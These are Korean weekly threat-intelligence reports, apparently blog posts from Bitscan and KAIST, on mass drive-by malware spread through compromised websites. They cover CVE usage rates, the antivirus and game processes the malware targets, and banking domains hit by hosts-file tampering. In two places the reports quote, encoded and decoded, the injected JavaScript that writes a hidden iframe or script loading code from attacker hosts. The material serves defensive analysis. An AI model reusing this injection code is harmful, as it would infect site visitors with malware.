    의 대응이 많이 부족한 상태라 계속 재발 되고 있으며, 대규모 감염을 시키기 위해 사용자가 방문 시 감염 될 수 있는 사이트들을 대규모로 확장하여 거대 네트워크를 운영 중입니다. 악성코드 전파용인 Malware net 은 금주의 관찰 결과 지난주 관찰되었던 백여 개 이상의 웹서비스들에서 중계되었던 http://www.xxxxxxxxx.com/script/js/script.js 악성 중계 링크의 경우 이 중 40% 가량이 금주 공격에 이용된 www.xxx.or.kr/popup_img/popup.js  전환되는 현상이 관찰 되었습니다 공격자가 Active 하게 활용   있는 상태라 확인이 되고 있습니다.

     

    www.xxx.or.kr/popup_img/popup.js -> 추가된 악성링크 내용

     

    if(document.cookie.indexOf('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%30%71%6C%2E%69%6E%66%6F%2F%77%6D%2F%68%75%69%77%65%69%2F%69%6E%64%65%78%2E%68%74%6D%6C%27%20%77%69%64%74%68%3D%27%31%30%30%27%20%68%65%69%67%68%74%3D%27%30%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E"));}

     

    Hex  Decode 

    -> if(document.cookie.indexOf('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("<iframe src='http://0ql.info/wm/huiwei/index.html' width='100' height='0' frameborder='0'></iframe>"));}



    <실제 악성링크의 구조도>



    정리하면 지난주에 활용 되었던 악성링크가 추가된 Malware net 40% 가량이 금주에 출현한 새로운 악성링크로 전환 되었으며 또한 규모도 전주보다 대폭 증가된 250여 곳 이상에서 관찰 되었습니다.

    본 링크에 대한 공개는 대규모 피해 방지를 위해 공개합니다또한 악성링크의 내용은 수시로 변경이 되고 있으며, 1회 변경시 마다 250여개 이상의 웹사이트에서 동시에 방문자 감염이 이루어 지게 되어 있습니다공격자로서는 매우 효율적인 방식이며 차단 및 대응을 하는 측에서는 곤혹스러운 상태라 할 수 있습니다.

     

    결론적으로 지금까지 사용 되어진 악성링크들을 반복해서 재활용 하는 형태는 여전 하며, 최종 설치되는 악성코드들도 동일한 유형을 계속 활용 하고 있습니다. 또한 행위 분석 방해를 위한 Virtual Machine 분석 회피 방안도 지속적으로 출현 중입니다한 가지 특이할 만한 사항은 저희쪽의 PCDS ( Pre Crime Detect System)을 회피하기 위해 3월에 이용 되었던 악성링크를 이번 대규모 악성코드 유포에 적극 활용 하였다는 점이며 이미 선 반영이 되어 향후에는 갱신된 실제 현황으로 브리핑이 가능 할 예정입니다.

     

     

    악성링크 자체 및 웹서비스 전체적으로 문제점 개선이 이루어 지지 않고, 악성코드 유포 인지도 못하는 상태라서, 대응이 되지 않는 악순환이 계속 되고 있습니다. 이제 공격자들은 자유로운 재활용을 넘어, 악성코드에 감염된 좀비 PC의 대규모 확산을 위해 악성코드 유포지를 대폭 늘리고 직접 활용을 하는 단계로 전환 되었습니다. 또한 대규모 Malware net을 자유자재로 변경하고 활용 하는 현상이 추가 관찰 되어 향후의 위험성은 더욱 높아진 상태입니다.  지금까지의 브리핑에서 언급 하였던 예상과 동일하게 진행이 되고 있으며 지금까지 차단을 권고 드린 IP 대역 대부분을 모두 재활용 하였습니다. 만약 차단을 하셨다면 상당히 많은 좀비 PC 감염 및 APT의 위험을 사전에 예방 하실 수 있으셨습니다.

     

    전체적으로 금주 국내 인터넷 서비스를 통한 악성코드 감염 및 좀비 PC 감염 비율은 상당히 높은 상태를 유지한 것으로 판단되며  금융권에 대한 정보유출을 위한 악성코드도  대규모 활동을 함으로써  강도 높은 경계 단계로 진입 합니다.

     

    6 1주차 특징은 다음과 같습니다.

     

    특징

    ·  · 다양한 취약성을 이용해 공격 성공 비율을 높이는 형태 계속

    ·  · 악성코드 유포지의 대폭 증가 및 대량 유포 현실화 - 향후 지속 될 것임

    ·  · 악성코드 유포자들의 전략적 행위 증가 및 범위 확대와 재활용 증가

              * 최대 250여 곳의 웹서비스가 동일 악성링크를 유포하는 것에 이용될 정도로 광범위한 증가

    ·  · 악성코드 분석 자체를 방해하기 위한 가상머신 우회기술, 루트킷(APT 형태) 유포 확대

    ·  · 3월부터 사용되었던 주요 악성링크 및 악성코드의 대규모 재활용 계속

    ·   은행 사용자를 겨냥한 Host 파일 변조 기능의 악성코드 유포 (홍콩으로 연결됨 

    대규모로 유포된 게임 계정 탈취형 악성코드에 추가된 기능으로서 국내에 상당규모 유포 되었을 것으로 추정됨  Host 파일에 변조된 IP 주소는 123.254.xxx.92 (홍콩)


    사이트명

    은행명

    은 행

    www.kbstar.com

    국민은행

    kbstar.com

    obank.kbstar.com

    banking.nonghyup.com

    농협

    www.wooribank.com

    우리은행

    wooribank.com

    pib.wooribank.com

    bank.keb.co.kr

    외환은행

    www.keb.co.kr

     

    * 악성링크를 중계하는 웹서비스의 증가는 웹서핑시 감염될 확률이 더욱 높아짐을 의미합니다.

     

    * 유포지와 중계지의 의미는 사용자 관점 이나 악성링크의 관점에서 다를 수 있습니다. 저희는 사용자 관점에서 웹 서핑시 방문한 웹서비스가 문제가 있어서 감염이 된다면 직접 방문한 사이트는 ‘ 악성코드 유포지’ , 악성코드를 받아 오게 하는 임의의 주소를 ‘ 악성링크’ , 최종 사용자에게 감염을 일으키는 파일 자체를 ‘악성코드’ 로 정의 하고 있습니다.

     

    사용자 PC에 대한 직접적인 공격을 일으키는 금주의 취약성은 주요 취약성 5개 가량에 집중이 되어 있으며 전주와 동일하게 Oracle Java 취약성에 대한 공격 비율이 가장 높은 비율을 차지 하고 있습니다. 또한 루트킷 및 APT 형태의 감염을 위해 사용자 PC에 디바이스 드라이버를 설치한 상태에서 내부 대역 스캔 및 특정 IP로 연결 하는 형태는 한번 감염시 막대한 피해를 감내해야 하는 부분이므로 강력한 보호 방안 수립이 요구 되고 있습니다. 

     

    패치 이외에도 다양한 방안을 강구해야 문제 해결 할 수 있으며 현재 모든 보안 솔루션들이 사후 대응에 중점을 맞추고 있는데 가장 중요한 것은 사전에 대응이 얼마나 되고, 발생 가능한 위험을 제거 했느냐가 핵심이 되어야 합니다. 

     


    ·   Oracle Java 취약성, Adobe Flash 취약성 , MS Medi  IE 취약성이 같이 사용 되어 공격 성공 비율을 높이는 경우가 꾸준히 관찰 되고 있으므로 전체 보안 수준 관리에 노력을 기울일 필요가 있습니다.

     

    ·   각 기술분석 보고서에 기술된 루트킷 및 키로거, 백도어 기능을 가진 악성코드들은, 사용자 PC의 드라이버 및 시스템 파일 교체, 윈도즈 서비스 등록등을 실행하고, 내부망 스캔 및 키로깅 그리고 외부에서 명령을 대기하는 행위가 지속 관찰 되고 있어서 위험성이 높습니다.

     

    ·  기술분석보고서에 언급된 백도어들은 상당히 많은 악성링크들이 이용되고 있어서 현재 공격자들이 주력하는 부분으로 판단됩니다. 모두 시스템에서의 백신 프로세스를 중지 시키고 국내.외 거의 모든 게임에 대한 프로세스를 지속적으로 모니터링 하고 있으며 현재 목적은 게임계정 탈취로 보여지고 있으나 언제든 외부 도메인 연결과 업데이트를 통해 다른 형태로 전환이 될 수 있습니다.

     

    모니터링 하는 프로세스의 종류는 하기와 같으며 국내의 대부분 백신 이외에도 넥슨의 OTP까지 모니터링을 하고 있습니다. 게임종류는 국내.외 게임사들의 주력 게임들이 모두 해당 되고 있습니다. OTP 관련 프로세스에 대한 후킹이나 모니터링이 된다는 것은 계정 도용 및 탈취를 막기 위한 보호대책을 추가적으로 모색해야 하는 상황으로 보여집니다금융권도 다르지 않습니다.

     ·

    프로세스명

    프로그램명

    백 신

    sgbider.exe

    vcsvc.exe

    vcsvcc.exe

    바이러스체이서

    NVCAgent.npc

    nsvmon.npc

    Nsavsvc.npc

    NaverAgent.exe

    네이버백신

    V3LRun.exe

    MUpdate2.exe

    SgSvc.exe

    V3Light.exe

    V3LTray.exe

    V3LSvc.exe

    V3

    AYUpdSrv.aye

    AYRTSrv.aye

    SkyMon.exe

    AYServiceNT.aye

    AYupdate.aye

    AyAgent.aye

    알약

    PCOTP.exe

    넥슨 OTP

    게 임

    gamehi.co.kr

    게임하이

    hangame.com

    한게임

    netmarble.net

    넷마블

    Raycity.exe

    레이시티

    ff2client.exe

    피파 온라인2

    pmang.com

    피망

    df.nexon.com

    dnf.exe

    던전 앤 파이터

    DragonNest.exe

    드래곤 네스트

    WinBaram.exe

    바람의 나라

    heroes.exe

    마비노기 영웅전

    wow.exe

    월드 오브 워크래프트

    lin.bin

    리니지

    MapleStory.exe

    메이플 스토리

     

     본 보고서에 기술되는 내용들은 이메일등을 이용한 소규모 침투가 아니라 웹서비스를 통한 대량 유포 및 감염입니다. 

    APT 형태가 사용하는 유포 취약성은 대부분 Java 취약성에 집중 되고 있습니다. 대응에 참고 하십시요.

     

    사용된 취약성 비율







    - CVE 2011-3544 ( 27.8%) Java Applet 취약성 

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

    - CVE 2012-0507 ( 12.4%) Java Applet 취약성 - Java Web start 취약성

    - CVE 2012-0003 (22.7%) Windows Midi 취약성 – 

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003 전문분석보고서 참고

    - CVE 2012-0754 (15.4%) Flash 취약성  

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

    - CVE 2010-0806 (12.7%) IE 취약성 ( IE 6,7 대상)

     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806


     -CVE 2011-2140 (8.2%) Adobe Flash 취약성

    - CVE 2011-1255 (0.4%) IE 취약점

    - CVE 2011-2110 (0.08%) Adobe Flash 취약성

     

    금주에 이용된 취약성에서는 기존에 적극적으로 이용되던 5가지 가량의 주요 취약성 이외에도 자주 사용되지 않던 IE  Flash 취약성의 활용도 일부 감지 되어 향후 변화가 예상 됩니다.

     



    < 6월 1주차 악성링크의 국가별 통계>

    금주의 차단 추가 영역은 다음과 같습니다. 아래 영역은 이미 공격자가 권한을 통제하고 있는 IP 대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재활용이 되고 있습니다. 기업 및 기관에서는 해당 IP 대역 차단 이후 ( 업무 관련성 여부에 대해서는 각기관 및 기업별 검토 필요) 차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 수 있으시며 매우 높은 수치임을 아실 수 있습니다.



    4월부터 차단 권고 드린 IP 대역은 금주에도 계속 재활용이 되었습니다. 강력한 차단을 유지하실 것을 권고 합니다.

     


    차단 권고 대역


    현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공될 예정입니다.


    감사합니다.

     

    *시범 서비스는 순차적으로 1개월 경과시 종료 됩니다. 4회 이상을 보고서를 받으셨다면 그 이전에 정식 구독서비스를 신청하셔야 보고서가 누락되지 않습니다.  KAIST CSRC 주간보안동향 보고서는 1p 짜리의 요약형태로 작성이 되며 무료 배포가 가능합니다. 해당 서비스의 신청은csyong95@kaist.ac.kr 로 신청 하시면 됩니다.

     

    * 정식 구독 서비스 가입 및 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명/ 담당자/ 연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다. 주위의 기업 및 기관들에게 정보 차원의 전달 가능합니다.

     

    * 본 분석은 악성링크 자체의 수집은 빛스캔의 PCDS (Pre crime detect system)를 통해  수집하며, 악성링크 및 악성코드 분석은 KAIST 사이버보안연구센터, 정보보호대학원과 공동으로 진행합니다.

     

    Posted by 바다란

     빛스캔과 KAIST 사이버보안센터에서 공동 운영하는 보안정보 제공 서비스 5 5주차 내용입니다본 정보제공 서비스는 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 알 수 있도록 하기 위한 것이 주된 목적이며차주부터 대규모로 확장된 상태로 운영 되고 있어서국내 인터넷 위협에 대한 주간 동향으로 참고하셔도 충분 할 것입니다.


     본 보고서의 활용 용도는 다음과 같은 활용이 가능합니다.


    1. 악성링크 및 악성코드 유포에 이용되는 IP 대역 차단을 통한 좀비 PC 감염 방지

    2. 악성링크가 공격에 활용하는 주된 취약성에 대한 내부 보안 강화 정책 - 패치

    3. 내부 감염된 APT 공격의 확인 및 제거에 활용 ( 각 개별 기술 분석 참고)


    금주 차의 특징은 2주전부터 언급 드렸던 공격자들의 전략적인 공격이 대폭 확대 되는 특징을 보이고 있습니다신규 악성링크 및 악성코드들은 전주와 대동소이한 양상을 보이고 있으나실제 악성링크 하나가 최소 10 ~ 최대 100 개 이상의 웹서비스에서 동시에 중계된 사례가 발생 하였습니다즉 중간 경로를 이용한 효율적 공격들이 대거 관찰 되고 있어서 전주 대비 영향력 면에서는 비교하기가 어려울 정도로 위험성이 높은 상태 입니다.

     

    금주의 악성코드 유포지로 이용된 웹서비스들은 412곳 이상이며 전주 대비 대폭 증가 되었으며 현재도 매우 활발하게 범위를 확산 시키고 있고 단 이틀 만에 백여 개 이상의 취약한 웹서비스들에 악성링크를 추가하는 적극적인 공격이 계속 되고 있습니다악성링크가 삽입된 웹서비스들의 대응이 많이 부족한 상태라 계속 재발 되고 있으며대규모 감염을 시키기 위해 사용자가 방문 시 감염 될 수 있는 사이트들을 대규모로 확장하여 거대 네트워크를 운영 중입니다기존의 봇넷과는 다른 형태의 악성코드 전파용 네트워크라 할 수 있습니다Malware net 이라 불러야 할 정도로 판단됩니다.


     




    대표적으로 대규모 확산된 악성링크는 http://www.xxxxxx.com/script/js/script.js 이며 국내 주요 웹서비스 100여곳 이상의 웹서비스 코드에 해당 링크가 추가 되어 방문시 마다 자동 실행을 통해 좀비 PC 감염을 확대 하고 있습니다본 요약을 작성하는 현재 6.6일 오후 3시에도 운영이 되고 있으며 내부에 들어 있는 코드는 다음과 같습니다.


    * 본 링크에 대한 공개는 공개된 글로 언급하는 것은 부적절하여 언급 하지 않도록 합니다.  현재 악성링크의 내용은 수시로 변경이 되고 있으며, 1회 변경시 마다 100여개 이상의 웹사이트에서 동시에 방문자 감염이 이루어 지게 되어 있습니다. 공격자로서는 매우 효율적인 방식이며 차단 및 대응을 하는 측에서는 곤혹스러운 상태라 할 수 있습니다.

     


    if(document.cookie.indexOf('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%35%30%2E%31%31%37%2E%31%31%33%2E???%2F%70%69%63%2F%69%6D%67%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"));}


    Hex  Decode 


    -> if(document.cookie.indexOf('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("<script src=http://50.117.113.XXX/pic/img.js></script>"));}

     

    이처럼 중간 경로를 가지고 최종 사용자를 공격하는 악성코드들을 자유롭게 변경하고 대규모로 운영을 할 수 있는 상황이 현재입니다.



    결론적으로 지금까지 사용 되어진 악성링크들을 반복해서 재활용 하는 형태는 여전 하며최종 설치되는 악성코드들도 동일한 유형을 계속 활용 하고 있습니다또한 행위 분석 방해를 위한 Virtual Machine 분석 회피 방안도 지속적으로 출현 중이나 현재 분석 및 대응이 완료된 상태로 분석에는 문제가 없는 상태를 유지 하고 있습니다.

     

    악성링크 자체 및 웹서비스 전체적으로 문제점 개선이 이루어 지지 않고악성코드 유포 인지도 못하는 상태라서대응이 되지 않는 악순환이 계속 되고 있습니다이제 공격자들은 자유로운 재활용을 넘어악성코드에 감염된 좀비 PC의 대규모 확산을 위해 악성코드 유포지를 대폭 늘리고 직접 활용을 하는 단계로 전환 되었습니다전주의 예상 드린 바와 동일하게 진행이 되고 있으며 5 4주차에 차단을 권고 드린IP 대역 대부분을 모두 재활용 하였습니다만약 차단을 하셨다면 상당히 많은 좀비 PC 감염 및 APT의 위험을 사전에 예방 하실 수 있으셨습니다.

     

    전체적으로 금주 국내 인터넷 서비스를 통한 악성코드 감염 및 좀비 PC 감염 비율은 상당히 높은 상태를 유지한 것으로 판단되며 주의 단계를 지난 상태로 보입니다.

     

    5 5주차 특징은 다음과 같습니다.


     

    특징

    • · 다양한 취약성을 이용해 공격 성공 비율을 높이는 형태 계속
    • · 악성코드 유포지의 대폭 증가 및 대량 유포 현실화 - 향후 지속 될 것임
    • · 악성코드 유포자들의 전략적 행위 증가 및 범위 확대

              * 최대 100여 곳의 웹서비스가 동일 악성링크를 유포하는 것에 이용될 정도로 광범위한 증가

    • · 악성코드 분석 자체를 방해하기 위한 가상머신 우회기술루트킷(APT 형태유포 확대
    • · 4월부터 사용되었던 주요 악성링크 및 악성코드의 대규모 재활용 계속

     

    악성링크를 중계하는 웹서비스의 증가는 웹서핑시 감염될 확률이 더욱 높아짐을 의미합니다.


    *유포지와 중계지의 의미는 사용자 관점 이나 악성링크의 관점에서 다를 수 있습니다저희는 사용자 관점에서 웹 서핑시 방문한 웹서비스가 문제가 있어서 감염이 된다면 직접 방문한 사이트는 ‘ 악성코드 유포지’ , 악성코드를 받아 오게 하는 임의의 주소를 ‘ 악성링크’ , 최종 사용자에게 감염을 일으키는 파일 자체를 ‘악성코드’ 로 정의 하고 있습니다.

     


    사용자 PC에 대한 직접적인 공격을 일으키는 금주의 취약성은 주요 취약성 5개 가량에 집중이 되어 있으며 전주와 동일하게 Oracle Java 취약성에 대한 공격 비율이 가장 높은 비율을 차지 하고 있습니다또한 루트킷 및 APT 형태의 감염을 위해 사용자 PC에 디바이스 드라이버를 설치한 상태에서 내부 대역 스캔 및 특정 IP로 연결 하는 형태는 한번 감염시 막대한 피해를 감내해야 하는 부분이므로 강력한 보호 방안 수립이 요구 되고 있습니다


    패치 이외에도 다양한 방안을 강구해야 문제 해결 할 수 있으며 현재 모든 보안 솔루션들이 사후 대응에 중점을 맞추고 있는데 가장 중요한 것은 사전에 대응이 얼마나 되고발생 가능한 위험을 제거 했느냐가 핵심이 되어야 합니다감염 이후에 대응은 휠씬 더 큰 피해를 입은 이후에 많은 비용과 자원 투입이 되어야 복구가 된다는 점을 잘 알고 계실 것 같습니다.


    •  Oracle Java 취약성, Adobe Flash 취약성 , MS Medi  IE 취약성이 같이 사용 되어 공격 성공 비율을 높이는 경우가 꾸준히 관찰 되고 있으므로 전체 보안 수준 관리에 노력을 기울일 필요가 있습니다.

     

    • 1,2,5 기술보고서에 언급된 루트킷 및 키로거백도어 기능을 가진 악성코드들은사용자 PC의 드라이버 및 시스템 파일 교체윈도즈 서비스 등록등을 실행하고내부망 스캔 및 키로깅 그리고 외부에서 명령을 대기하는 행위가 지속 관찰 되고 있어서 위험성이 높습니다.

          * 해당 보고서들은 정식 구독 신청 및 시범 서비스 신청하신 기관/기업에만 제공 됩니다. 

    • 4번 기술분석보고서에 언급된 백도어들은 상당히 많은 악성링크들이 이용되고 있어서 현재 공격자들이 주력하는 부분으로 판단됩니다.모두 시스템에서의 백신 프로세스를 중지 시키고 국내.외 거의 모든 게임에 대한 프로세스를 지속적으로 모니터링 하고 있으며 현재 목적은 게임계정 탈취로 보여지고 있으나 언제든 외부 도메인 연결과 업데이트를 통해 다른 형태로 전환이 될 수 있습니다.



    모니터링 하는 프로세스의 종류는 하기와 같으며 국내의 대부분 백신 이외에도 넥슨의 OTP까지 모니터링을 하고 있습니다게임종류는 국내.외 게임사들의 주력 게임들이 모두 해당 되고 있습니다. OTP 관련 프로세스에 대한 후킹이나 모니터링이 된다는 것은 계정 도용 및 탈취를 막기 위한 보호대책을 추가적으로 모색해야 하는 상황으로 보여집니다. 금융권도 다르지 않습니다.


    프로세스명

    프로그램명

    백 신

    sgbider.exe

    vcsvc.exe

    vcsvcc.exe

    바이러스체이서

    NVCAgent.npc

    nsvmon.npc

    Nsavsvc.npc

    NaverAgent.exe

    네이버백신

    V3LRun.exe

    MUpdate2.exe

    SgSvc.exe

    V3Light.exe

    V3LTray.exe

    V3LSvc.exe

    V3

    AYUpdSrv.aye

    AYRTSrv.aye

    SkyMon.exe

    AYServiceNT.aye

    AYupdate.aye

    AyAgent.aye

    알약

    PCOTP.exe

    넥슨 OTP

    게 임

    gamehi.co.kr

    게임하이

    hangame.com

    한게임

    netmarble.net

    넷마블

    Raycity.exe

    레이시티

    ff2client.exe

    피파 온라인2

    pmang.com

    피망

    df.nexon.com

    dnf.exe

    던전 앤 파이터

    DragonNest.exe

    드래곤 네스트

    WinBaram.exe

    바람의 나라

    heroes.exe

    마비노기 영웅전

    wow.exe

    월드 오브 워크래프트

    lin.bin

    리니지

    MapleStory.exe

    메이플 스토리

     

    • 5 2주차에 발견된 가상머신 실행을 감지(Vmware  magic number)하고 종료하거나 분석을 회피하도록 설계된 악성코드의 대량 유포는 계속 진행 되고 있습니다.

     

    · 항상 말씀드리지만 루트킷 또는 APT 유형은 감염 즉시 심각한 피해를 장기적으로 유발 할 수 있으므로 심각한 주의가 필요합니다더군다나 본 보고서에 기술되는 내용들은 이메일등을 이용한 소규모 침투가 아니라 웹서비스를 통한 대량 유포 및 감염입니다


    APT 형태가 사용하는 유포 취약성은 대부분 Java 취약성에 집중 되고 있습니다대응에 참고 하십시요.


     

    사용된 취약성 비율

    - CVE 2011-3544 ( 24.2%) Java Applet 취약성 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

    - CVE 2012-0507 ( 28.3%) Java Applet 취약성 - Java Web start 취약성

    - CVE 2012-0003 (20.2%) Windows Midi 취약성 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003 3월의 전문분석보고서를 참고

    - CVE 2012-0754 (26.3%) Flash 취약성 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

    - CVE 2010-0806 (1.0%) IE 취약성 ( IE 6,7 대상http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806

     

    금주의 차단 추가 영역은 다음과 같습니다아래 영역은 이미 공격자가 권한을 통제하고 있는 IP 대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재활용이 되고 있습니다기업 및 기관에서는 해당 IP 대역 차단 이후 ( 업무 관련성 여부에 대해서는 각기관 및 기업별 검토 필요차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 수 있으시며 매우 높은 수치임을 아실 수 있습니다.

    4월부터 차단 권고 드린 IP 대역은 금주에도 계속 재활용이 되었습니다강력한 차단을 유지하실 것을 권고 합니다.

     

    차단 권고 대역

    각 개별 분석보고서에는 별도의 차단 대역들이 존재하니 참고 하시고 사안별로 모니터링 및 차단에 활용 하십시요.

     

    -본 지면에서는 공개 하지 않습니다.

     

    현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공될 예정입니다.

     

    *시범 서비스는 순차적으로 1개월 경과시 종료 됩니다. 4회 이상을 보고서를 받으셨다면 그 이전에 정식 구독서비스를 신청하셔야 보고서가 누락되지 않습니다 KAIST CSRC 주간보안동향 보고서는 1p 짜리의 요약형태로 작성이 되며 무료 배포가 가능합니다해당 서비스의 신청은csyong95@kaist.ac.kr 로 신청 하시면 됩니다.
     
    정식 구독 서비스 가입 및 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명담당자연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다주위의 기업 및 기관들에게 정보 차원의 전달 가능합니다.
     
    본 분석은 악성링크 자체의 수집은 빛스캔에서 수행하며악성링크 및 악성코드 분석은 KAIST 사이버보안센터정보보호대학원과 공동으로 진행합니다.

    Posted by 바다란

    안녕하세요전 상훈입니다.

     

    빛스캔과 KAIST 사이버보안센터에서 공동 운영하는 보안정보 제공 서비스 5 4주차 내용입니다본 정보제공 서비스는 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 알 수 있도록 하기 위한 것이 주된 목적입니다.

     

    금주의 가장 큰 특징은 신규 악성링크는 줄어든 비율을 보이고 있으며악성링크를 통해 유포되는 실제 악성코드들도 신규 유형은 대폭의 감소를 보이고 있습니다그러나 실제 악성코드를 사용자들에게 감염 시키는 악성코드 유포지의 수치는 전주 대비 50% 이상 증가한 것으로 확인이 되고 있습니다.

     

    최종적인 한주간의 특징을 살펴보면 지금껏 활용 되어왔던 악성링크들의 재활용 증가 및 사용자 PC에 설치되는 악성코드들의 재활용도 증가 하고 있으며 이 악성코드를 대규모 유포를 하기 위해 사용자가 방문 시 감염 될 수 있는 사이트들을대규모로 늘리고 있는 것으로 판단 됩니다.

     

     결론적으로 보면 지금까지 사용 되어진 악성링크들을 반복해서 재활용을 하고 있으며 최종 설치되는 악성코드들도 동일한 유형을 계속 활용 하고 있습니다대응이 되지 않고 있어서 자유롭게 활용을 하고 있으며 , 대규모 확산을위해 악성코드 유포지를 대폭 늘리는 상황이 금주에 관찰된 가장 큰 이슈가 되겠습니다. 즉 감염 PC의 대규모적인 확대를 꾀하고 있는 것으로 관찰 되고 있습니다.

     

     

    금주의 큰 특징은 다음과 같습니다.

     

    특징

    ·  다양한 취약성을 이용해 공격 성공 비율을 높이는 형태 계속

    ·  악성코드 유포지의 대폭 증가 현상 관찰  - 향후 주의 필요

    ·  악성코드 유포자들의 전략적 행위 증가  범위 확대 계속

    ·   악성코드 분석 자체를 방해하기 위한 가상머신 우회기술,  루트킷 유포 발견

    ·   4월부터 사용되었던 주요 악성링크  악성코드의 대규모 재활용 계속

    ·   악성링크의 추가와 제거가  보고서 발송일 까지도 간헐적으로 계속 


    악성링크를 중계하는 웹서비스의 증가는 웹서핑시 감염될 확률이 더욱 높아짐을 의미합니다.


    *유포지와 중계지의 의미는 사용자 관점 이나 악성링크의 관점에서 다를 수 있습니다저희는 사용자 관점에서 웹 서핑시 방문한 웹서비스가 문제가 있어서 감염이 된다면 직접 방문한 사이트는 ‘ 악성코드 유포지’ , 악성코드를 받아 오게 하는 임의의 주소를 ‘ 악성링크’ , 최종 사용자에게 감염을 일으키는 파일 자체를 악성코드’ 로 정의 하고 있습니다.






    사용자 PC에 대한 직접적인 공격을 일으키는 금주의 취약성은  주요 취약성 5개 가량에 집중이 되어 있으며 전주와 동일하게  Oracle Java 취약성에 대한 공격 비율이 가장 높은 비율을 차지 하고 있습니다

    강력하게 사내 및 해당 기관이나 기업에 보안패치 권고를 해야만 합니다패치를 하지 않을 경우 문제를 해결 할 수 있는 방안은 인터넷 사용 금지 외엔 없습니다.

     

    Oracle Java 취약성, Adobe Flash 취약성 , MS Medi  IE 취약성이 같이 사용 되어 공격 성공 비율을 높이는 경우가 계속 관찰 되고 있으므로 전체 보안 수준 관리에 노력을 기울일 필요가 있습니다.

     

    ·   3번 기술보고서에 언급된 루트킷은 이미 해외 백신 일부에서는 탐지하고 있는 내용이며 사용자 PC의 드라이버를 교체하여 상주하며 향후 APT 및 내부에 대한 추가 공격과 같은 다양한 위험요소를 만들 수 있습니다전문 분석은 향후 진행될 예정이며 간략한 분석 내용은 threatexpert에 저희쪽에서 올려 간단히 체크된 내용을 참고 하십시요.  - 본 게시물에서는 생략합니다.


     

    ·   전주에 이어서 금주에도 가상머신 실행을 감지하고 종료하거나 분석을 회피하도록 설계된 악성코드가 대량 유포 되었습니다본 내용은 향후 전문분석을 통해 상세하게 전달이 될 예정입니다.


    ·  게임 계정을 해킹 하는 코드들이 대량으로 유포 되고 있으며 대상 게임은  엔씨 -리니지 , 한게임 -테라 , 넥슨 -메이플스토리,엘소드블리자드-와우, CJ인터넷 - 피파온라인네오플-던파 이며  디아블로에 대한 계정 탈취 유형도 발견 될 것으로 보입니다.


    ·  항상 말씀드리지만 루트킷 또는 APT 유형은 감염 즉시 심각한 피해를 장기적으로 유발   있으므로 심각한 주의가 필요합니다더군다나  보고서에 기술되는 내용들은 이메일등을 이용한 소규모 침투가 아니라 웹서비스를 통한 대량 유포  감염입니다.  APT 형태가 사용하는 유포 취약성은 대부분 Java 취약성에 집중 되고 있습니다.  대응에 참고 하십시요.

     


    사용된 취약성

     

    - CVE 2011-3544 ( 23.6%)  Java Applet 취약성 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

    - CVE 2012-0507 ( 24.7%) Java Applet 취약성 - Java Web start 취약성

    - CVE 2012-0003 ( 20.2%) Windows Midi 취약성 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003 3월의 전문분석보고서를 참고 

    - CVE 2012-0754 (21.3%)  Flash 취약성 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

    - CVE 2010-0806 (9.0%)  IE 취약성 ( IE 6,7 대상http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806

     


    <5월 4주차 주간 동향 보고서의 누적 취약성 통계>

     

    전주 대비 특이 사항으로는 Java applet 취약성을 노린 공격 및 Windows Midi 관련된 공격이 전주의 급증세를 유지하고 있습니다전주와 대비해 달라진 취약성 비율과 공격의 자세한 변화들에 대해서는 5월 4주차 동향분석 보고서를 참고 하십시요.

     

     

